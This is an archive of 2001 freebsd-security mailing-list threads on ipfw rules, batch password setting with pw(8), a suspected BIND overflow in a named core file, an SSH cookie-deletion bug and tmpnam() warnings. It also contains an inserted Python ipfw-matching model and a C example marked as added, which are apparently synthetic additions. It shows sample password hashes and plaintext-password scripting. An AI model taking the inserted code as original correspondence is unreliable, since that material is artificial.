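    dst: ipaddress.IPv4Network
    dports: Optional[Set[int]]   # None means "any destination port"


def _net(token: str) -> ipaddress.IPv4Network:
    if token == "any":
        return ipaddress.ip_network("0.0.0.0/0")
    if token == "MY_IP":
        token = MY_IP
    return ipaddress.ip_network(token, strict=False)


def _ports(spec: Optional[str]) -> Optional[Set[int]]:
    """'22,5618,10000' or '3932-32023' -> set of ports; None -> any."""
    if spec is None:
        return None
    out: Set[int] = set()
    for part in spec.split(","):
        lo, _, hi = part.partition("-")
        out.update(range(int(lo), int(hi or lo) + 1))
    return out


def parse_rules(text: str) -> List[Rule]:
    rules = []
    for seq, line in enumerate(text.splitlines()):
        line = line.strip()
        if not line or line.startswith("#"):
            continue                      # commented-out rules are not loaded
        m = _RULE.match(line)
        if not m:
            raise ValueError(f"unsupported rule syntax: {line}")
        rules.append(Rule(int(m["num"]), seq, m["action"], m["proto"],
                          _net(m["src"]), _net(m["dst"]), _ports(m["ports"])))
    # ipfw keeps the chain sorted by number; equal numbers keep insertion order
    return sorted(rules, key=lambda r: (r.num, r.seq))


def first_match(rules: List[Rule], proto: str, src: str, dst: str,
                dport: Optional[int] = None) -> Tuple[Optional[int], str]:
    """(rule number, action) of the first matching rule, else (None, 'deny')."""
    s, d = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    for r in rules:
        if r.proto not in ("all", "ip", proto):
            continue
        if s not in r.src or d not in r.dst:
            continue
        if r.dports is not None and dport not in r.dports:
            continue
        return r.num, r.action
    return None, "deny"   # assumed default policy


def uncomment(text: str, *nums: int) -> str:
    """Enable the '#add N ...' lines with the given rule numbers."""
    pat = r"^#(add\s+(%s)\s)" % "|".join(map(str, nums))
    return re.sub(pat, r"\1", text, flags=re.M)


def split_port_list(text: str, num: int) -> str:
    """Rewrite 'add NUM ... P1,P2,P3' as one same-numbered rule per port."""
    out = []
    for line in text.splitlines():
        m = _RULE.match(line.strip())
        if m and int(m["num"]) == num and m["ports"] and "," in m["ports"]:
            prefix = line.strip()[: -len(m["ports"])]
            out.extend(prefix + p for p in m["ports"].split(","))
        else:
            out.append(line)
    return "\n".join(out)


if __name__ == "__main__":
    base = parse_rules(RULESET)
    opened = parse_rules(uncomment(RULESET, 575, 600))
    for probe in (("tcp", "198.51.100.7", MY_IP, 22), ("tcp", "198.51.100.7", MY_IP, 80),
                  ("tcp", "192.168.1.5", MY_IP, 80), ("udp", "198.51.100.7", MY_IP, 53)):
        print(probe, "posted ->", first_match(base, *probe),
              "| 575/600 enabled ->", first_match(opened, *probe))
```

In the model the posted chain admits TCP/22 to MY_IP through rule 615 and drops TCP/80 at the default policy, a packet from 192.168.x.x is accepted by rule 500 before anything else is consulted (Vladimir's point), enabling 575 makes every inbound packet match 575 (Marcel's "all ports open"), and the split form of 615 is indistinguishable from the comma form. If a real box diverges from that, the difference is in the loaded rules, which "ipfw list" shows after the parser has had its say.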
From: "Antoine Beaupre (LMC)"
To: "Karsten W. Rohrbach"
Cc: freebsd-security@FreeBSD.ORG
Message-ID: <3B1FC40D.68911B9D@lmc.ericsson.se>
Date: Thu, 07 Jun 2001 14:12:29 -0400
Organization: LMC, Ericsson Research Canada
Subject: Re: IPFW rules > ports still open!

FWIW, I had some problems adding rules in the format:

allow tcp from any to ip 22,3932-32023

I think the parser needs revision... But you have a good hint there,
putting the rules in the same rule #

A.

"Karsten W. Rohrbach" wrote:
>
> Marcel Dijk(nascar24@home.nl)@2001.06.07 19:08:29 +0000:
> > > M> add 615 allow tcp from any to MY_IP 22,5618,10000
> > > M> add 625 allow tcp from MY_IP to any
> try:
>
> add 615 allow tcp from any to MY_IP 22
> add 615 allow tcp from any to MY_IP 5618
> add 615 allow tcp from any to MY_IP 10000
> add 625 allow tcp from MY_IP to any
>
> perhaps there exist some side effects in the rule parser?
>
> /k
>
> --
> > God isn't dead -- he's been busted.
> KR433/KR11-RIPE -- WebMonster Community Founder -- nGENn GmbH Senior Techie
> http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.net/
> karsten&rohrbach.de -- alpha&ngenn.net -- alpha&scene.org -- catch@spam.de
> GnuPG 0x2964BF46 2001-03-15 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 BF46

--
Semantics is the gravity of abstraction.

From owner-freebsd-security Thu Jun 7 11:19:57 2001
Date: Thu, 7 Jun 2001 20:20:14 +0200
From: "Karsten W. Rohrbach"
To: David Miner
Cc: edwin chan, Olivier Nicole, freebsd-security@FreeBSD.ORG
Subject: Re: Encrypted passwords
Message-ID: <20010607202014.S59617@mail.webmonster.de>

a simple script using pwgen(1) from the ports collection to generate the
cleartext password, using pw(8)'s instrumentation for passing a password
to it via filehandle would simplify things a bit, i think.
/k

David Miner(david@slis-two.lis.fsu.edu)@2001.06.07 12:22:03 +0000:
> On Thu, 7 Jun 2001, edwin chan wrote:
>
> > I think that :
> > you have a user list, and you can make a random password for them, then you
> > can use "expect" and " passwd user" do your jobs and don't worry how chpass
> > works.
> >
> Using "passwd" for 50 users at a time is something I would like to
> automate. "adduser" also works, one user at a time. That is what I was
> trying to get away from.
>
> David
> ---------------------------------------------------------------------
> David R. Miner                         miner@lis.fsu.edu
> Systems Integrator                     voice: 850-644-8107
> School of Information Studies          fax: 850-644-6253
> Florida State University
> Tallahassee, FL 32306-2100

--
> "The path of excess leads to the tower of wisdom." --W. Blake
KR433/KR11-RIPE -- WebMonster Community Founder -- nGENn GmbH Senior Techie
http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.net/
karsten&rohrbach.de -- alpha&ngenn.net -- alpha&scene.org -- catch@spam.de
GnuPG 0x2964BF46 2001-03-15 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 BF46

From owner-freebsd-security Thu Jun 7 11:37:16 2001
Message-ID: <2BFD35C3F1F9D31185CE00B0D0202302838707@SUNKING>
From: Greg Haa
To: "'freebsd-security@FreeBSD.ORG'"
Subject: Named
Date: Thu, 7 Jun 2001 11:37:05 -0700

So this was in a named.core file.

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>BBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>BBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAaa

or something very similar. Can you tell me what this means?

-thanks
greg.haa@amux.com

From owner-freebsd-security Thu Jun 7 11:40:36 2001
Date: Thu, 7 Jun 2001 14:41:57 -0400 (EDT)
From: David Miner
To: "Karsten W. Rohrbach"
Cc: edwin chan, Olivier Nicole
Subject: Re: Encrypted passwords
In-Reply-To: <20010607202014.S59617@mail.webmonster.de>

On Thu, 7 Jun 2001, Karsten W. Rohrbach wrote:

> a simple script using pwgen(1) from the ports collection to generate the
> cleartext password, using pw(8)'s instrumentation for passing a password
> to it via filehandle would simplify things a bit, i think.
> /k
>
It's not the generation of the passwords that is the problem. It's the
encryption.

I put print statements into the program, created two users, and checked
vipw.

These are the outputs:

entries in pwd.db:

try-1:wUe7aHIXK/8O.:1260:1337::0:0:LIStry-1:/usr/try-1:/bin/csh
try-2:tgx8fwK0d6cQM:1261:1338::0:0:LIStry-2:/usr/try-2:/bin/csh

Program output:

Enter password file name: pw7
Password file read
Enter path to home directories: /usr
Enter class name: try
Enter first number wanted: 1
Enter number of users wanted: 2
try-1 chock1

wUlVdJxRtry-1 /usr/try-1 wUe7aHIXK/8O.
chpass: updating the database...
chpass: done
try-2 chock1

tgtM0gIZtry-2 /usr/try-2 tgx8fwK0d6cQM
chpass: updating the database...
chpass: done

Notice that the encrypted password from the program appears to be the same
as reported in vipw. But the user cannot log in with the password.

David
---------------------------------------------------------------------
David R. Miner                         miner@lis.fsu.edu
Systems Integrator                     voice: 850-644-8107
School of Information Studies          fax: 850-644-6253
Florida State University
Tallahassee, FL 32306-2100

From owner-freebsd-security Thu Jun 7 11:49:16 2001
Date: Thu, 7 Jun 2001 20:49:29 +0200
From: "Karsten W. Rohrbach"
To: David Miner
Cc: edwin chan, Olivier Nicole, freebsd-security@FreeBSD.ORG
Subject: Re: Encrypted passwords
Message-ID: <20010607204929.U59617@mail.webmonster.de>
In-Reply-To: <20010607202014.S59617@mail.webmonster.de>

David Miner(david@slis-two.lis.fsu.edu)@2001.06.07 14:41:57 +0000:
> On Thu, 7 Jun 2001, Karsten W. Rohrbach wrote:
>
> > a simple script using pwgen(1) from the ports collection to generate the
> > cleartext password, using pw(8)'s instrumentation for passing a password
> > to it via filehandle would simplify things a bit, i think.
> > /k
> >
> It's not the generation of the passwords that is the problem. It's the
> encryption.

why bother encrypting the password if you already have instrumentation in
the base system for that? you could create the account and use system()
with pw -u user -h whatever, piping a cleartext password into it, having
the system care for the correct encryption (be it MD5 or 3DES or blowfish
or whatever). i did exactly this on a mass-hosting system until we switched
it to a different, ldap based, login system with direct application support
(e.g. no real accounts, everything is one uid, validation is done in the
ftp servers etc).

from pw(1):
---
     -h fd   This option provides a special interface by which interactive
             scripts can set an account password using pw.  Because the
             command line and environment are fundamentally insecure
             mechanisms by which programs can accept information, pw will
             only allow setting of account and group passwords via a file
             descriptor (usually a pipe between an interactive script and
             the program).  sh, bash, ksh and perl all possess mechanisms
             by which this can be done.  Alternatively, pw will prompt for
             the user's password if -h 0 is given, nominating stdin as the
             file descriptor on which to read the password.  Note that this
             password will be read only once and is intended for use by a
             script rather than for interactive use.  If you wish to have
             new password confirmation along the lines of passwd(1), this
             must be implemented as part of an interactive script that
             calls pw.

             If a value of `-' is given as the argument fd, then the
             password will be set to `*', rendering the account
             inaccessible via password-based login.
---
/k

> I put print statements into the program, created two users, and checked
> vipw.
>
> These are the outputs:
>
> entries in pwd.db:
>
> try-1:wUe7aHIXK/8O.:1260:1337::0:0:LIStry-1:/usr/try-1:/bin/csh
> try-2:tgx8fwK0d6cQM:1261:1338::0:0:LIStry-2:/usr/try-2:/bin/csh
>
> Program output:
>
> Enter password file name: pw7
> Password file read
> Enter path to home directories: /usr
> Enter class name: try
> Enter first number wanted: 1
> Enter number of users wanted: 2
> try-1 chock1
>
> wUlVdJxRtry-1 /usr/try-1 wUe7aHIXK/8O.
> chpass: updating the database...
> chpass: done
> try-2 chock1
>
> tgtM0gIZtry-2 /usr/try-2 tgx8fwK0d6cQM
> chpass: updating the database...
> chpass: done
>
> Notice that the encrypted password from the program appears to be the same
> as reported in vipw. But the user cannot log in with the password.
>
> David

--
> Vegetarians for oral sex -- "The only meat that's fit to eat"
KR433/KR11-RIPE -- WebMonster Community Founder -- nGENn GmbH Senior Techie
http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.net/
karsten&rohrbach.de -- alpha&ngenn.net -- alpha&scene.org -- catch@spam.de
GnuPG 0x2964BF46 2001-03-15 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 BF46

From owner-freebsd-security Thu Jun 7 12:10:20 2001
Date: Thu, 7 Jun 2001 15:15:38 -0400 (EDT)
From: Ralph Huntington
To: David Miner
Cc: "Karsten W. Rohrbach", edwin chan, Olivier Nicole, freebsd-security@FreeBSD.ORG
Subject: Re: Encrypted passwords

I use "expect" and a script-generated script for encrypting the passwd.
Here's the shell script my account-maker script generates and then runs to
set the password. This happens after the account-maker script uses "pw" to
make the actual user account (which puts a "*" in the passwd field).

#!/usr/local/bin/expect
set argv username
spawn -noecho passwd [lindex $argv 0]
expect "Changing local password for username."
send ""
expect "word:"
send "PassWord\r"
expect "word:"
send "PassWord\r"
expect eof

Obviously, have your script replace "username" with the actual username
and "PassWord" with the actual plaintext password. For security, have your
script unlink the expect script after it has run.

This just uses the "passwd" command non-interactively thanks to the expect
utility. It may not be terribly elegant, but I use this every day and it
works fine. I hope it's useful for you!

Ralph

On Thu, 7 Jun 2001, David Miner wrote:

> On Thu, 7 Jun 2001, Karsten W. Rohrbach wrote:
>
> > a simple script using pwgen(1) from the ports collection to generate the
> > cleartext password, using pw(8)'s instrumentation for passing a password
> > to it via filehandle would simplify things a bit, i think.
> > /k
> >
> It's not the generation of the passwords that is the problem. It's the
> encryption.
>
> I put print statements into the program, created two users, and checked
> vipw.
>
> [...]
>
> Notice that the encrypted password from the program appears to be the same
> as reported in vipw. But the user cannot log in with the password.
>
> David

From owner-freebsd-security Thu Jun 7 12:34:17 2001
Date: Thu, 7 Jun 2001 12:22:25 -0700 (PDT)
From: Linh Pham
To: Greg Haa
Cc: "'freebsd-security@FreeBSD.ORG'"
Subject: Re: Named
In-Reply-To: <2BFD35C3F1F9D31185CE00B0D0202302838707@SUNKING>

On 2001-06-07, Greg Haa scribbled:
# So this was in a named.core file.
#
# AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>BBBBBBBBBBBBBBBBBBBBBBB
# BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
# AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>BBBBBBBBBBBBBBBBBBBBBB
# BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAaa

Could you include a snippet of your syslog? Just do 'more /var/log/messages'
and see if there are any errors with 'named' listed. Also, do you know which
version of BIND (ie: named) you are running? You can find out by running
'named -v'. If it's not 8.2.3-REL or 9.x.x then you should upgrade it to at
least 8.2.3-REL (9.1.x preferred of course). It could be that you are getting
hacked by a known security bug in earlier versions of BIND.

--
Linh Pham [lplist@closedsrc.org] // 404b - Brain not found

From owner-freebsd-security Thu Jun 7 13:02:21 2001
Date: Thu, 7 Jun 2001 22:02:27 +0200
From: "Karsten W. Rohrbach"
To: Ralph Huntington
Cc: David Miner, edwin chan, Olivier Nicole, freebsd-security@FreeBSD.ORG
Subject: Re: Encrypted passwords
Message-ID: <20010607220227.W59617@mail.webmonster.de>
In-Reply-To: from rjh@mohawk.net on Thu, Jun 07, 2001 at 03:15:38PM -0400

correct me if i am just stupid, but i don't get the point

echo -n passW0Rd | pw -u testuser -h 1

sets the password of "testuser" to "passW0Rd", storing it in the auth system
you prefer in encrypted form. am i missing something?

/k

Ralph Huntington(rjh@mohawk.net)@2001.06.07 15:15:38 +0000:
> I use "expect" and a script-generated script for encrypting the passwd.
> Here's the shell script my account-maker script generates and then runs to
> set the password. This happens after the account-maker script uses "pw" to
> make the actual user account (which puts a "*" in the passwd field).
>
> #!/usr/local/bin/expect
> set argv username
> spawn -noecho passwd [lindex $argv 0]
> expect "Changing local password for username."
> send ""
> expect "word:"
> send "PassWord\r"
> expect "word:"
> send "PassWord\r"
> expect eof
>
> Obviously, have your script replace "username" with the actual username
> and "PassWord" with the actual plaintext password. For security, have your
> script unlink the expect script after it has run.
>
> This just uses the "passwd" command non-interactively thanks to the expect
> utility. It may not be terribly elegant, but I use this every day and it
> works fine. I hope it's useful for you!
>
> Ralph
>
> On Thu, 7 Jun 2001, David Miner wrote:
>
> > On Thu, 7 Jun 2001, Karsten W. Rohrbach wrote:
> >
> > > a simple script using pwgen(1) from the ports collection to generate the
> > > cleartext password, using pw(8)'s instrumentation for passing a password
> > > to it via filehandle would simplify things a bit, i think.
> > > /k
> >
> > It's not the generation of the passwords that is the problem. It's the
> > encryption.
> >
> > I put print statements into the program, created two users, and check
> > vipw.
> >
> > These are the outputs:
> >
> > entries in pwd.db:
> >
> > try-1:wUe7aHIXK/8O.:1260:1337::0:0:LIStry-1:/usr/try-1:/bin/csh
> > try-2:tgx8fwK0d6cQM:1261:1338::0:0:LIStry-2:/usr/try-2:/bin/csh
> >
> > Program output:
> >
> > Enter password file name: pw7
> > Password file read
> > Enter path to home directories: /usr
> > Enter class name: try
> > Enter first number wanted: 1
> > Enter number of users wanted: 2
> > try-1 chock1
> >
> > wUlVdJxRtry-1 /usr/try-1 wUe7aHIXK/8O.
> > chpass: updating the database...
> > chpass: done
> > try-2 chock1
> >
> > tgtM0gIZtry-2 /usr/try-2 tgx8fwK0d6cQM
> > chpass: updating the database...
> > chpass: done
> >
> > Notice that the encrypted password from the program appears to be the same
> > as reported in vipw. But the user cannot login with the password.
> >
> > David
> > ---------------------------------------------------------------------
> > David R. Miner                        miner@lis.fsu.edu
> > Systems Integrator                    voice: 850-644-8107
> > School of Information Studies         fax: 850-644-6253
> > Florida State University
> > Tallahassee, FL 32306-2100
> >
>

--
> "Niklaus Wirth has lamented that, whereas Europeans pronounce his name
> correctly (Ni-klows Virt), Americans invariably mangle it into
> (Nick-les Worth). Which is to say that Europeans call him by name, but
> Americans call him by value."
KR433/KR11-RIPE -- WebMonster Community Founder -- nGENn GmbH Senior Techie
http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.net/
karsten&rohrbach.de -- alpha&ngenn.net -- alpha&scene.org -- catch@spam.de
GnuPG 0x2964BF46 2001-03-15 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 BF46

From owner-freebsd-security Thu Jun 7 13:32:22 2001
Date: Thu, 7 Jun 2001 16:33:38 -0400 (EDT)
From: David Miner
To: "Karsten W. Rohrbach"
Cc: Ralph Huntington, edwin chan, Olivier Nicole
Subject: Re: Encrypted passwords
In-Reply-To: <20010607220227.W59617@mail.webmonster.de>

On Thu, 7 Jun 2001, Karsten W. Rohrbach wrote:

> correct me if i am just stupid, but i don't get the point
> echo -n passW0Rd | pw -u testuser -h 1
> sets the password of "testuser" to "passW0Rd", storing it in the auth
> system you prefer in encrypted form. am i missing something?
>
> /k
>

No, I don't think you have missed the point. Using echo and piping it into
pw would work. I am trying to read the cleartext password from a file and,
since I haven't figured out how the pw file descriptor works, encrypt it and
use the chpass utility to get it into /etc/passwd. Because I have to do this
50 accounts at a time.

It looks like it encrypts correctly, but the user cannot log in with that
password. So something must be wrong with the encryption system or the way I
have put the pieces together.

David
---------------------------------------------------------------------
David R. Miner                        miner@lis.fsu.edu
Systems Integrator                    voice: 850-644-8107
School of Information Studies         fax: 850-644-6253
Florida State University
Tallahassee, FL 32306-2100

From owner-freebsd-security Thu Jun 7 14:16:53 2001
Date: Thu, 7 Jun 2001 23:16:40 +0200
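The Karsten/David exchange above turns on pw(8)'s file-descriptor interface ("-h fd"): pw takes the new password from a descriptor rather than from the command line, because anything placed in argv or the environment is readable by other users through ps(1). What follows is an added example, not code from the thread or from FreeBSD, showing how a batch program hands a secret to a child over a pipe attached to the child's stdin. The pw_set_password() wrapper spells out the FreeBSD form of that call ("pw usermod -n USER -h 0") and assumes it runs on FreeBSD; the /bin/sh stand-in in main() is a constructed substitute for pw so the program can be run anywhere:

```c
/* Added example (not from the thread): deliver a secret to a child process
 * over a pipe on its stdin, the way pw(8)'s "-h 0" expects it, instead of
 * passing it in argv or the environment where ps(1) can read it. */
#ifndef _XOPEN_SOURCE
#define _XOPEN_SOURCE 700
#endif
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Write all of buf to fd, retrying on short writes and EINTR. */
static int write_all(int fd, const char *buf, size_t len)
{
    while (len > 0) {
        ssize_t w = write(fd, buf, len);
        if (w < 0) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        buf += w;
        len -= (size_t)w;
    }
    return 0;
}

/* Run argv[] (looked up on PATH) with `secret` plus a newline on its stdin.
 * Returns the child's exit status (0..255), or -1 on a local failure. */
int run_with_secret_on_stdin(char *const argv[], const char *secret)
{
    int p[2], status;
    pid_t pid;

    if (pipe(p) < 0)
        return -1;
    /* If the child exits before reading, write() fails with EPIPE instead
     * of SIGPIPE killing this process. */
    signal(SIGPIPE, SIG_IGN);

    pid = fork();
    if (pid < 0) {
        close(p[0]);
        close(p[1]);
        return -1;
    }
    if (pid == 0) {
        /* Child: the pipe's read end becomes stdin; the secret is never
         * part of the child's argv or environment. */
        close(p[1]);
        if (dup2(p[0], STDIN_FILENO) < 0)
            _exit(127);
        close(p[0]);
        execvp(argv[0], argv);
        _exit(127);
    }
    /* Parent: feed the secret, then close so the child sees EOF. */
    close(p[0]);
    if (write_all(p[1], secret, strlen(secret)) < 0 || write_all(p[1], "\n", 1) < 0) {
        close(p[1]);
        waitpid(pid, &status, 0);
        return -1;
    }
    close(p[1]);
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* The same mechanism in the shape of the FreeBSD call the thread is about:
 * "pw usermod -n USER -h 0" reads the new password from descriptor 0.
 * pw(8) only exists on FreeBSD, so this wrapper is not exercised below. */
int pw_set_password(const char *user, const char *password)
{
    char *argv[] = { "pw", "usermod", "-n", (char *)user, "-h", "0", NULL };
    return run_with_secret_on_stdin(argv, password);
}

int main(void)
{
    /* Constructed stand-in for pw: a shell that reads one line from stdin
     * and exits 0 only if it matches. */
    char *argv[] = { "/bin/sh", "-c", "read p; test \"$p\" = s3cret", NULL };
    printf("child exit status: %d\n", run_with_secret_on_stdin(argv, "s3cret"));
    return 0;
}
```

A loop over a "user:password" file would call pw_set_password() once per line; the cleartext never leaves the parent process except through the pipe, which is what makes pw's refusal to take a password on the command line workable in a batch script.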
From: Markus Friedl
To: Andreas Haugsnes, security@freebsd.org
Subject: Re: [fwd] SSH allows deletion of other users files...
Message-ID: <20010607231640.A4172@folly>
References: <20010606124702.A30808@lucky.net> <20010606124822.A26583@consistent.unicore.no>
 <20010606125321.A56634@mithrandr.moria.org> <20010606131130.A26605@consistent.unicore.no>
 <20010606143323.G18735@ringworld.oblivion.bg>
In-Reply-To: <20010606143323.G18735@ringworld.oblivion.bg>; from roam@orbitel.bg on Wed, Jun 06, 2001 at 02:33:23PM +0300

On Wed, Jun 06, 2001 at 02:33:23PM +0300, Peter Pentchev wrote:
> > > Are you using X forwarding? (ie, ssh -X)
>
> Yes, disabling X forwarding would be an easy workaround.
> Can somebody, however, test if the following patch resolves the problem?
> It certainly does for me..
>
> Well, ok, so there is still a race condition between the stat() and unlink()
> in the cleanup procedure.. but since there is no funlink() yet, I do not
> really think this one can be resolved :( And besides, there's a *much*
> smaller window of opportunity there.

i think it's simpler to switch uids when removing the cookie file.

http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/session.c.diff?r1=1.77&r2=1.80

-m

From owner-freebsd-security Thu Jun 7 14:16:59 2001
Message-ID: <002d01c0ef97$238cbce0$6c01a8c0@mpcsecurity.com>
From: "Robert Herrold"
To: "Greg Haa"
References: <2BFD35C3F1F9D31185CE00B0D0202302838707@SUNKING>
Subject: Re: Named
Date: Thu, 7 Jun 2001 16:16:07 -0500

Yes, that's someone trying to exploit your box using a named bug. Looks to
me like you're running a <8.2.3 REL of bind. Make sure you're running bind
8.2.3 or later. If you're not, I would recommend you get chkrootkit to
verify you haven't been rooted.

www.chkrootkit.org

Bob Herrold
Senior Network Engineer
Metropark Communications
10405 A Baur Blvd
St Louis MO 63132
(314)439-1900

----- Original Message -----
From: "Greg Haa"
Sent: Thursday, June 07, 2001 1:37 PM
Subject: Named

> So this was in a named.core file.
>
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>BBBBBBBBBBBBBBBBBBBBBBB
> BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>BBBBBBBBBBBBBBBBBBBBBB
> BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAaa
>
> or something very similar. Can you tell me what this means?
>
> -thanks
>
> greg.haa@amux.com

From owner-freebsd-security Thu Jun 7 15:11:17 2001
Date: Fri, 8 Jun 2001 01:10:20 +0300 (EEST)
From: Ruslan Kutsin
Subject: ttt
Message-ID: <20010608011009.T31829-100000@interpharm.kiev.ua>

auth 2228b350 unsubscribe freebsd-security ya@interpharm.kiev.ua

From owner-freebsd-security Thu Jun 7 18:28:10 2001
Date: Thu, 7 Jun 2001 20:32:32 -0500 (COT)
From: Buliwyf McGraw
To: security@FreeBSD.ORG
Subject: Unsafe Message

Every time I compile something on my server, I get this message:

warning: tmpnam() possibly used unsafely; consider using mkstemp()

What does it mean? How can I avoid it?

Thanks for any help.

=======================================================================
Buliwyf McGraw
Administrator of the Libertad Server
Information Services Center
Universidad del Valle
=======================================================================

From owner-freebsd-security Thu Jun 7 18:35:59 2001
Date: Thu, 7 Jun 2001 21:35:55 -0400
From: Chris Johnson
To: Buliwyf McGraw
Cc: security@FreeBSD.ORG
Subject: Re: Unsafe Message
Message-ID: <20010607213555.A80297@palomine.net>
In-Reply-To: from buliwyf@libertad.univalle.edu.co on Thu, Jun 07, 2001 at 08:32:32PM -0500

On Thu, Jun 07, 2001 at 08:32:32PM -0500, Buliwyf McGraw wrote:
> Every time I compile something on my server, I get this message:
>
> warning: tmpnam() possibly used unsafely; consider using mkstemp()
>
> What does it mean?

tmpnam() was possibly used unsafely

> How can I avoid it?

consider using mkstemp()

Chris

From owner-freebsd-security Thu Jun 7 18:47:51 2001
From: "Michael Tang Helmeste"
Subject: RE: Unsafe Message
Date: Thu, 7 Jun 2001 21:47:23 -0400
In-Reply-To: <20010607213555.A80297@palomine.net>

If it's not in your code, it's most likely in one of the libraries that it
uses.

-----Original Message-----
From: owner-freebsd-security@FreeBSD.ORG
[mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Chris Johnson
Sent: Thursday, June 07, 2001 9:36 PM
To: Buliwyf McGraw
Cc: security@FreeBSD.ORG
Subject: Re: Unsafe Message

On Thu, Jun 07, 2001 at 08:32:32PM -0500, Buliwyf McGraw wrote:
> Every time I compile something on my server, I get this message:
>
> warning: tmpnam() possibly used unsafely; consider using mkstemp()
>
> What does it mean?

tmpnam() was possibly used unsafely

> How can I avoid it?

consider using mkstemp()

Chris

From owner-freebsd-security Thu Jun 7 19:26:04 2001
Date: Thu, 7 Jun 2001 21:30:16 -0500 (COT)
From: Buliwyf McGraw
To: Michael Tang Helmeste
Cc: security@FreeBSD.ORG
Subject: RE: Unsafe Message

> If it's not in your code, it's most likely in one of the libraries that it
> uses.

Thanks for your answer.

I was reading the man pages of the functions:

tmpnam()     tempnam, tmpfile, tmpnam - temporary file routines
mkstemp()    make temporary file name (unique)

But I am not sure about how to improve the libraries... I mean, is there a
patch or something for this specific error???

Thanks for any "smart" answer.

> -----Original Message-----
> From: owner-freebsd-security@FreeBSD.ORG
> [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Chris Johnson
> Sent: Thursday, June 07, 2001 9:36 PM
> To: Buliwyf McGraw
> Cc: security@FreeBSD.ORG
> Subject: Re: Unsafe Message
>
> On Thu, Jun 07, 2001 at 08:32:32PM -0500, Buliwyf McGraw wrote:
> > Every time I compile something on my server, I get this message:
> >
> > warning: tmpnam() possibly used unsafely; consider using mkstemp()
> >
> > What does it mean?
>
> tmpnam() was possibly used unsafely
>
> > How can I avoid it?
>
> consider using mkstemp()
>
> Chris

=======================================================================
Buliwyf McGraw
Administrator of the Libertad Server
Information Services Center
Universidad del Valle
=======================================================================

From owner-freebsd-security Thu Jun 7 21:20:14 2001
Date: Thu, 7 Jun 2001 21:20:13 -0700
From: Vince Hoang
To: freebsd-security@FreeBSD.ORG
Subject: Re: root & toor
Message-ID: <20010607212013.B4738@anarchy.com>
References: <20010607100241.N30276-100000@axis.tdd.lt> <20010607182152.B724@ringworld.oblivion.bg>
In-Reply-To: <20010607182152.B724@ringworld.oblivion.bg>; from roam@orbitel.bg on Thu, Jun 07, 2001 at 06:21:52PM +0300

> All login shells in the FreeBSD base system are statically linked -
> they are all placed in /bin, and everything in /bin and /sbin *must*
> be statically linked for obvious reasons (think NFS-mounted /usr).

Bug?

# uname -r
4.3-STABLE
# ldd /bin/rmail
/bin/rmail:
        libc.so.4 => /usr/lib/libc.so.4 (0x28067000)

-Vince

From owner-freebsd-security Thu Jun 7 21:30:05 2001
Date: Fri, 8 Jun 2001 08:31:07 +0400 (MSD)
From: "Alexey V. Neyman"
To: Vince Hoang
Subject: Re: root & toor
In-Reply-To: <20010607212013.B4738@anarchy.com>

hi, there!

On Thu, 7 Jun 2001, Vince Hoang wrote:
>> All login shells in the FreeBSD base system are statically linked -
>> they are all placed in /bin, and everything in /bin and /sbin *must*
>> be statically linked for obvious reasons (think NFS-mounted /usr).
>
>Bug?
>
># uname -r
>4.3-STABLE
># ldd /bin/rmail
>/bin/rmail:
>        libc.so.4 => /usr/lib/libc.so.4 (0x28067000)

man rmail:

BUGS
     Rmail should not reside in /bin.

-------------------------------------+------------------------------
Does the fish swallow the stone?     | Regards, Alexey V. Neyman
Perhaps, but that is not the point.  | mailto: avn@any.ru
---------------------(Pkunk, SC2)----+------------------------------

From owner-freebsd-security Thu Jun 7 23:05:17 2001
Date: Fri, 8 Jun 2001 09:03:57 +0300
From: Peter Pentchev
To: "Alexey V. Neyman"
Cc: Vince Hoang, freebsd-security@FreeBSD.ORG
Subject: Re: root & toor
Message-ID: <20010608090357.B12983@ringworld.oblivion.bg>
References: <20010607212013.B4738@anarchy.com>
In-Reply-To: from avn@any.ru on Fri, Jun 08, 2001 at 08:31:07AM +0400

On Fri, Jun 08, 2001 at 08:31:07AM +0400, Alexey V. Neyman wrote:
> hi, there!
>
> On Thu, 7 Jun 2001, Vince Hoang wrote:
>
> >> All login shells in the FreeBSD base system are statically linked -
> >> they are all placed in /bin, and everything in /bin and /sbin *must*
> >> be statically linked for obvious reasons (think NFS-mounted /usr).
> >
> >Bug?
> >
